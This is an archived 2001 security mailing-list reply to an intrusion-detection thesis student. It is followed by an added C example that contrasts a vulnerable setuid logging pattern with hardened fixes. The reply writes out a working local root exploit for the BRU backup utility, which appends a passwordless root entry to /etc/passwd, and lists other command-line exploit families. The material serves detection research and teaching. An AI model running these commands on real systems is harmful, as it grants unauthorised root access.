A good way to test a hacker's skills is to put him on a random box with only console access (no way to access outside exploits). His tools: a compiler, find, ps, a debugger and his intuition (lsof and strace if he's real lucky). Give him/her 12 hours to succeed (without getting up to browse a website for vulnerability information). How many so-called "network security specialists" out there would succeed... not many, very few actually. Why? Most pentesters aren't good at all... just prepared. Their worst nightmare is being thrown into a secure network unprepared. It takes true talent to succeed in an unfamiliar, secure situation. (This is a big reason why contests last as long as they do.) Becoming familiar with command line based exploits will greatly help with these situations.

Command line exploits:

I found a vulnerability several months ago in BRU (Backup Restoration Utility), which is suid root. By specifying the BRUEXECLOG environment variable, we could change the log file bru would write to (as root). We have to be sneaky though, because we can't access any other command line options without being root. -V gets version info. We also have to export BRUEXECLOG so bru can see it.

Exploit:

$ export BRUEXECLOG=/etc/passwd
$ bru -V '
>rooted::0:0::/:/bin/bash
>'
$

If you want command line only exploits look at:

  path exploits
  IFS exploits (IFS = Internal Field Separator, I believe)
  environment variable exploits
  symlink exploits
  glibc bugs

Search the "Vulnerabilities" section at securityfocus.com for:

  PATH=
  IFS
  "ln -s"
  LD_

Keep in mind, many command line based exploits are shell scripts. Also look at the older HPUX/DGUX/IRIX exploits; there are many of these types of exploits there.
http://www.securityfocus.com/vdb/?id=1929
http://www.securityfocus.com/vdb/?id=541
http://www.securityfocus.com/vdb/?id=454

Riley Hassell
Vulnerability Developer
eEye Digital Security

----- Original Message -----
From: "Marc Plaggemeier" <mpat_private>
To: <VULN-DEVat_private>
Sent: Wednesday, April 11, 2001 3:02 AM
Subject: Looking for exploits

> Hello,
>
> perhaps the list is the right place to ask some questions about
> the "sort of exploits".
>
> I am actually writing my diploma thesis about intrusion detection.
> My system has an anomaly and a misuse detection module.
> Now I am looking for some exploits to test my misuse detection module.
> It controls only commands given by the users (nothing else).
>
> So I was looking for some exploits which only use the command line. No
> shell script or something else.
> But I did not find so many. Most of the exploits were C programs or
> shell scripts (using some sort of buffer overflows).
>
> So my question is:
> Are there any exploits which are "based" on the command line? (like old
> sendmail bugs) I know there are some exploits! But how can I find some
> of them? I searched in some archives but ...
>
> How many exploits are based on C programs or shell scripts? Are there any
> statistics?
>
> Perhaps someone can help me!
>
> Thanks,
> Greetings
> Marc Plaggemeier
>
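The BRUEXECLOG bug Riley describes, reduced to the pattern behind it, as an added example that is not BRU's code and not part of either message above. A setuid-root program takes its log-file path from an environment variable the unprivileged caller controls, so root ends up appending caller-chosen text (here the argument being logged) to /etc/passwd. vulnerable_log_path() reproduces that mistake; safe_log_path() and append_log_line() show the usual fixes: ignore the environment whenever privilege was gained, confine any override to a log directory, open with O_NOFOLLOW against the symlink variant, and drop privileges before touching the filesystem. BRUEXECLOG is the real variable name; DEFAULT_LOG and LOG_DIR are assumed values for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>

/* Assumed defaults for the illustration; BRU's real paths are not known here. */
#define DEFAULT_LOG "/var/log/bru/execlog"
#define LOG_DIR     "/var/log/bru/"

/* VULNERABLE: the log path comes straight from the environment.  In a setuid
 * root binary this is the BRU bug: the unprivileged caller sets
 * BRUEXECLOG=/etc/passwd and root appends whatever gets logged (here, argv). */
const char *vulnerable_log_path(const char *env_value)
{
    return (env_value != NULL) ? env_value : DEFAULT_LOG;
}

/* Returns 1 if any path component is "..", which would let a caller walk out
 * of LOG_DIR even though the string starts with the allowed prefix. */
int has_dotdot_component(const char *path)
{
    const char *p = path;
    while (*p != '\0') {
        const char *seg = p;
        while (*p != '\0' && *p != '/')
            p++;
        if (p - seg == 2 && seg[0] == '.' && seg[1] == '.')
            return 1;
        if (*p == '/')
            p++;
    }
    return 0;
}

/* HARDENED: the override is honoured only when no privilege was gained
 * (real uid equals effective uid) and only for a path confined to LOG_DIR. */
const char *safe_log_path(const char *env_value, uid_t ruid, uid_t euid)
{
    if (ruid != euid)                    /* running setuid: never trust the env */
        return DEFAULT_LOG;
    if (env_value == NULL || env_value[0] == '\0')
        return DEFAULT_LOG;
    if (strncmp(env_value, LOG_DIR, strlen(LOG_DIR)) != 0)
        return DEFAULT_LOG;              /* must live inside the log directory */
    if (has_dotdot_component(env_value))
        return DEFAULT_LOG;              /* no /var/log/bru/../../etc/passwd */
    return env_value;
}

/* Append one line.  O_NOFOLLOW closes the companion symlink trick
 * (ln -s /etc/passwd /var/log/bru/mine.log); the caller is expected to have
 * dropped privileges first, so the write happens with the invoker's rights. */
int append_log_line(const char *path, const char *line)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0640);
    if (fd < 0)
        return -1;
    size_t len = strlen(line);
    int ok = (write(fd, line, len) == (ssize_t)len) && (write(fd, "\n", 1) == 1);
    close(fd);
    return ok ? 0 : -1;
}

/* Stand-alone demo: shows which file each variant would write for the
 * current environment, then logs argv[1] the hardened way.  Run as
 *   BRUEXECLOG=/etc/passwd ./a.out 'rooted::0:0::/:/bin/bash'
 * to see the vulnerable variant pick /etc/passwd and the safe one refuse. */
int main(int argc, char **argv)
{
    const char *env = getenv("BRUEXECLOG");
    uid_t ruid = getuid(), euid = geteuid();

    printf("vulnerable would write to: %s\n", vulnerable_log_path(env));
    printf("hardened   would write to: %s\n", safe_log_path(env, ruid, euid));

    /* Drop any setuid privilege permanently before touching the filesystem. */
    if (setuid(ruid) != 0)
        return 1;
    if (argc > 1 && append_log_line(safe_log_path(env, ruid, euid), argv[1]) != 0)
        perror("append_log_line");
    return 0;
}
```

The ruid/euid test is the part that matters most for the case in the post: once a binary is installed suid root, any environment variable it consults is attacker input, and the only safe default is to ignore it. The prefix and dot-dot checks only make sense after that, and the O_NOFOLLOW open plus the privilege drop cover the "ln -s" and symlink-race variants Riley lists alongside the environment ones.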
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 18:21:38 PDT